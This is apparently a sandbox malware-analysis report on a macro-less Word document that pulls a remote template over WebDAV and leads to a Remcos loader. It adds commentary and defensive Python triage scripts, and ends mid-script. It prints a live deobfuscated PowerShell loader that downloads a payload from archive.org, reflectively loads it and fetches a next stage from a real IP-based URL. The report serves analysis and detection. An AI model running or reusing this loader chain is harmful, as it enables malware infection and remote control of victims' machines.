                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: nlaapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
                    Source: xrrwwstCMd.LNK.0.dr	LNK file: ..\..\..\..\..\Desktop\xrrwwstCMd.docx
                    Source: Window Recorder	Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: xrrwwstCMd.docx	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
                    Source: xrrwwstCMd.docx	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
                    Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
                    Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: ~WRD0000.tmp.0.dr	Initial sample: OLE summary template = B0E0C498
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: xrrwwstCMd.docx Initial sample: OLE indicators vbamacros = False

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041CBE1
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_005B8F44 push eax; retf 7_2_005B8F61
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_005C0F14 push eax; retn 005Bh 7_2_005C0F61
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_005C4336 push eax; ret 7_2_005C43FB
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_005AF724 push 0000006Eh; ret 7_2_005AF741
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_005B01F4 push eax; retf 7_2_005B01F5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_005C0F8A push eax; retn 005Bh 7_2_005C0F61
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0021591C push 34022060h; iretd 11_2_00215925
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0021255D push ebx; retf 11_2_002125EA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00212D8A pushfd ; ret 11_2_00212D99
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0021258D push ebx; retf 11_2_002125EA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_002121C8 push ebx; iretd 11_2_002121EA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00212378 pushfd ; retf 11_2_00212381
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00212345 pushad ; retf 11_2_00212359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00457186 push ecx; ret 12_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0045E55D push esi; ret 12_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00457AA8 push eax; ret 12_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00434EB6 push ecx; ret 12_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_10002806 push ecx; ret 12_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00451D34 push eax; ret 14_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00414060 push eax; ret 15_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00414060 push eax; ret 15_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00414039 push ecx; ret 15_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
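                    The two PowerShell command lines above are the whole loader chain in clear text once the encoding is undone. The first one (wscript.exe -> powershell.exe) carries $Codigo, a base64 string of the UTF-16LE script with its 'A' characters (the encoding of the zero high bytes) swapped for a placeholder that this report renders as runs of '?'; the remainder of that command, which would restore the placeholder and run the result, is truncated in the report. The second one is what it decodes to: download new_image.jpg from archive.org, cut the text between <<BASE64_START>> and <<BASE64_END>>, base64-decode it, load it with [System.Reflection.Assembly]::Load and call dnlib.IO.Home.VAI with a URL written backwards, three times the string 'desativado' (Portuguese for "disabled") and 'RegAsm', which matches the RegAsm.exe process that hosts Remcos later in this report. Note that the statement `$startIndex -ge 0 -and $endIndex -gt $startIndex` is evaluated as a bare expression and never branches on anything; if a marker is missing the loader just throws at Substring. The Python below, added here for offline triage and not code from the report or from the sample, replays those decoding steps against constructed input. The placeholder character, the fake image bytes and the MZ/PE stub are assumptions made for the demonstration; only the marker strings, the reversed URL argument and the shape of $Codigo come from the report.

```python
"""Offline replay of the two decoding steps visible in the PowerShell chain
(added example; not code from the report or from the malware). Everything
except the marker strings, the reversed VAI argument and the shape of the
$Codigo string is constructed or assumed here."""
import base64
import re

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"


def decode_stage1(codigo: str, placeholder: str) -> str:
    """Stage 1: $Codigo is base64 of a UTF-16LE script whose 'A' characters
    were swapped for a placeholder. The real placeholder is not recoverable
    from the report (it shows up as runs of '?'), so it is a parameter here."""
    b64 = codigo.replace(placeholder, "A")
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def obfuscate_stage1(script: str, placeholder: str) -> str:
    """Constructed inverse of decode_stage1, used only to build test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode().replace("A", placeholder)


def extract_embedded_payload(blob: bytes) -> bytes:
    """Stage 2: pull the base64 text between the markers out of the downloaded
    'image' and decode it. The loader evaluates
    `$startIndex -ge 0 -and $endIndex -gt $startIndex` as a bare expression and
    never branches on it; this version fails closed instead."""
    start = blob.find(START_FLAG)
    end = blob.find(END_FLAG)
    if start < 0 or end <= start:
        raise ValueError("payload markers missing or out of order")
    start += len(START_FLAG)
    b64 = re.sub(rb"\s+", b"", blob[start:end])  # FromBase64String skips whitespace
    return base64.b64decode(b64, validate=True)


def is_pe_image(data: bytes) -> bool:
    """Assembly.Load() needs a PE/CLR image: check the MZ and PE signatures."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_reversed_url(arg: str) -> str:
    """The first argument handed to dnlib.IO.Home.VAI is the next-stage URL
    written backwards."""
    return arg[::-1]


def minimal_pe_stub() -> bytes:
    """Constructed 0x80-byte blob with valid MZ/PE signature offsets; enough to
    exercise is_pe_image(), not a loadable assembly."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr)


def build_fake_image(payload: bytes) -> bytes:
    """Constructed stand-in for the downloaded new_image.jpg: JPEG-looking
    bytes around the marked base64 block."""
    return (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00 padding " + START_FLAG + b"\n"
            + base64.b64encode(payload) + b"\n" + END_FLAG + b"\xff\xd9")


if __name__ == "__main__":
    stage2 = "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg'"
    print("stage 1 round trip:", decode_stage1(obfuscate_stage1(stage2, "\u00a7"), "\u00a7") == stage2)
    pe = extract_embedded_payload(build_fake_image(minimal_pe_stub()))
    print("PE image:", is_pe_image(pe))
    print("next stage:", decode_reversed_url("txt.CHMR/05/481.142.932.58//:ptth"))
```

                    Run against a real capture of new_image.jpg, extract_embedded_payload() gives the same bytes Assembly.Load received, and is_pe_image() tells you whether they are worth dropping into a .NET decompiler; the reversed first argument resolves to the plain http:// URL the loaded assembly fetches next, which is the indicator to pull from proxy logs.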

                    Persistence and Installation Behavior

                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\zeep.ly\DavWWWRoot (2 identical entries)
                    Source: settings.xml.rels Extracted files from sample: http://zeep.ly/rxgon
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc.0.dr
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: B0E0C498.doc.0.dr
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00406EEB ShellExecuteW,URLDownloadToFileW, 12_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 12_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041CBE1
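                    The first three entries in this block are the initial access: the document itself has no macros (vbamacros = False above), but word/_rels/settings.xml.rels holds an external relationship to http://zeep.ly/rxgon, and WINWORD.EXE then probes \\zeep.ly\DavWWWRoot through a network redirector and loads davhlpr.dll, i.e. it fetches the remote part over WebDAV and drops the RTF/.doc files listed as File dump (one of which then hits EQNEDT32.EXE). The report shows the URL but not the relationship type; the Python below, an added triage example that is not part of the report, assumes the attachedTemplate type that settings.xml.rels normally carries, and builds a minimal .docx in memory to run against. Only the URL comes from the report; the package contents are constructed.

```python
"""Triage helper (added example, not part of the report): list every external
relationship in an OOXML package and flag a remote attachedTemplate in
word/_rels/settings.xml.rels, the pattern the sample in this report used to
make Word reach http://zeep.ly/rxgon over WebDAV before showing any content.
The .docx below is constructed in memory; only the URL is from the report."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")


def external_relationships(docx_bytes: bytes) -> list[dict]:
    """Return [{part, type, target}] for every Relationship element with
    TargetMode="External" in any .rels part of the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                hits.append({
                    "part": name,
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target", ""),
                })
    return hits


def is_remote_template_injection(hits: list[dict]) -> bool:
    """True when the settings part carries an external attachedTemplate that
    points at a network location, so Word will fetch it on open."""
    return any(h["part"].endswith("settings.xml.rels")
               and h["type"] == "attachedTemplate"
               and h["target"].lower().startswith(("http://", "https://", "\\\\", "file:"))
               for h in hits)


def build_sample_docx(template_url: str) -> bytes:
    """Constructed minimal .docx whose settings part references a remote
    template; enough structure for the scanner, not a document Word would open."""
    rels = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_url}" TargetMode="External"/>'
            f'</Relationships>')
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"><w:body/></w:document>')
        zf.writestr("word/settings.xml",
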